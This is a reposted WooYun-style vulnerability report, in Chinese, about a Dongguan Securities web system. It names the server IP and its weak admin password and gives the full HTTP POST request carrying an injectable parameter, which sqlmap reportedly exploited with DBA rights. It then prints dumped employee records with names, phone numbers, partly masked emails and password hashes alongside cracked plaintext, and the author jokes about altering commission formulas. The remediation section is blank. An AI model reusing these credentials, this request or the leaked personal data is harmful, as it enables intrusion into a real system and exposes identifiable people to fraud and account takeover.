神刀安全网

东莞证券某站弱口令到SQL注入导致用户(姓名/电话/邮箱等)信息泄露

简要描述:

RT

详细说明:

http://113.78.134.110:81/login.do 弱口令admin:000000

东莞证券某站弱口令到SQL注入导致用户(姓名/电话/邮箱等)信息泄露

发现了一些有意思的功能,比如可以控制提成

东莞证券某站弱口令到SQL注入导致用户(姓名/电话/邮箱等)信息泄露

若是我直接修改了提成的公式,然后勾搭一两个人那啥(好暴利)。

漏洞证明:

code 区域
POST /plug-in/FormulaEdit/xcfa/XCFA_operater.jsp?MODE=getRYJB HTTP/1.1
Host: 113.78.134.110:81
Content-Length: 7
Accept: */*
Origin: http://113.78.134.110:81
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://113.78.134.110:81/plug-in/common/transfer.jsp?ObjName=JspXCFA_ALL&Title=%E8%96%AA%E9%85%AC%E6%96%B9%E6%A1%88%E6%9F%A5%E7%9C%8B&Target=%2FUIProcessor%3FTable%3DJspXCFA_ALL%26ObjDescribe%3DekQgsYuZOYlCJlO7vghYvv41*q*BGee3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,es;q=0.6,fr;q=0.4,vi;q=0.2
Cookie: JSESSIONID=CD1D8642528FC7F86453EDE89D86BA6D.server1; UserID=admin; PortalToken=CD1D8642528FC7F86453EDE89D86BA6D.server1; ys-TreeState_5c1e7d68efba511c6e0ea9b8cafa4fb3.gt=o%3ARoot%3Ds%253AE%5EType.0%3Ds%253AE%5EType.1%3Ds%253AE; ys-TreeState_93782624d81163345d84577e158e26bd.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_799cde630a734708b3880f841ffa3f7d=o%3A1%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_e0b9adc1f800d29087017abd5def90cb.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_ed9b71d747488ab403c5cbf458822293.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_190cd205bb5a88c520b1fb91a3415f3a.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_7ef60d9127bb21b3203ca468ff919460.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_aa1c2e4bf18892844e938f68b2de3da1.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE; ys-TreeState_293313064b95482991c003a03ac389b8.gt=o%3Aroot%3Ds%253AE%5ERoot%3Ds%253AE

RYFL=24

直接丢sqlmap里面,发现还是DBA权限

东莞证券某站弱口令到SQL注入导致用户(姓名/电话/邮箱等)信息泄露

查看到用户量不大,才1W多些

东莞证券某站弱口令到SQL注入导致用户(姓名/电话/邮箱等)信息泄露

但是涉及到用户的姓名,电话,邮箱等基本信息,提取了最近的部分

code 区域
787134,6014436,//u8881//u52b2//u94ba,xtheme-blue,5463610,1,[email protected],13672920390,main|document_manage|remoteAccount,//u8425//u9500//u4eba//u5458//u6570//u636e//u7edf//u8ba1,5078,96e79218965eb72c92a549dd5a330112 (111111),5078101,0,2015-06-05 17:15:00,2014-12-16 16:28:31,6,5078101,2014-12-16 16:28:31
83462,6014452,//u5218//u4e9a//u521a,xtheme-blue,NULL,1,NULL,15231525063,main|document_manage|remoteAccount,//u8425//u9500//u4eba//u5458//u6570//u636e//u7edf//u8ba1,5013,96e79218965eb72c92a549dd5a330112 (111111),5013101,0,NULL,2014-12-17 14:07:04,0,5013101,2014-12-17 14:07:04
19561,6014456,//u8bb8//u7ef4//u5178,xtheme-blue,85822938,0,[email protected],18688061642,main|document_manage|remoteAccount,//u8425//u9500//u4eba//u5458//u6570//u636e//u7edf//u8ba1,5049,96e79218965eb72c92a549dd5a330112 (111111),5049101,0,NULL,2014-12-17 15:33:44,0,5049101,2014-12-17 15:33:44
82842,6014529,//u738b//u4e3d//u8273,xtheme-blue,NULL,1,NULL,NULL,main|document_manage|remoteAccount,//u8425//u9500//u4eba//u5458//u6570//u636e//u7edf//u8ba1,5011,96e79218965eb72c92a549dd5a330112 (111111),5011101,0,2015-01-15 13:37:38,2014-12-24 10:25:45,1,5011101,2014-12-24 10:25:45
qijm,6014597,//u7941//u5609//u654f,xtheme-blue,NULL,0,NULL,NULL,finance|remoteAccount,//u8d22//u52a1//u7ba1//u7406,10007,96e79218965eb72c92a549dd5a330112 (111111),admin,0,2015-03-05 09:07:49,2014-12-31 15:56:36,38,admin,2014-12-31 15:56:36
71666,6014794,//u6768//u7389//u9752,xtheme-blue,NULL,1,NULL,13591173727,main|document_manage,//u8425//u9500//u4eba//u5458//u6570//u636e//u7edf//u8ba1,5071,96e79218965eb72c92a549dd5a330112 (111111),5071101,0,NULL,2015-01-26 10:45:15,0,5071101,2015-01-26 10:45:15
71621,6014795,//u90ed//u715c,xtheme-blue,NULL,1,NULL,15904269933,main|document_manage,//u8425//u9500//u4eba//u5458//u6570//u636e//u7edf//u8ba1,5071,96e79218965eb72c92a549dd5a330112 (111111),5071101,0,NULL,2015-01-26 10:47:15,0,5071101,2015-01-26 10:47:15
69794,6014869,//u8d75//u7fe0//u83b9,xtheme-blue,NULL,1,NULL,13790491703,main|document_manage,//u8425//u9500//u4eba//u5458//u6570//u636e//u7edf//u8ba1,5069,96e79218965eb72c92a549dd5a330112 (111111),5069101,0,2015-03-19 14:56:36,2015-02-09 15:02:45,3,5069101,2015-02-09 15:02:45
18406,6014874,//u949f//u94ed//u7235,xtheme-blue,85186861,1,NULL,18825520374,main|document_manage,//u8425//u9500//u4eba//u5458//u6570//u636e//u7edf//u8ba1,5048,21218cca77804d2ba1922c33e0151105 (888888),5048101,0,2015-07-06 16:33:04,2015-02-10 10:16:15,23,5048101,2015-02-10 10:16:15
817275,6014904,//u9ec4//u4fca//u6807,xtheme-blue,07566290229,1,[email protected],13660799890,main|document_manage,//u8425//u9500//u4eba//u5458//u6570//u636e//u7edf//u8ba1,5010,b82ef710e72ee35fc33bd9a454668b01,5010101,0,2015-06-05 16:44:12,2015-02-26 15:18:29,8,5010101,2015-02-26 15:18:29

居然发现了大量的弱口令…

修复方案:

版权声明:神刀安全网转自 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 东莞证券某站弱口令到SQL注入导致用户(姓名/电话/邮箱等)信息泄露

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮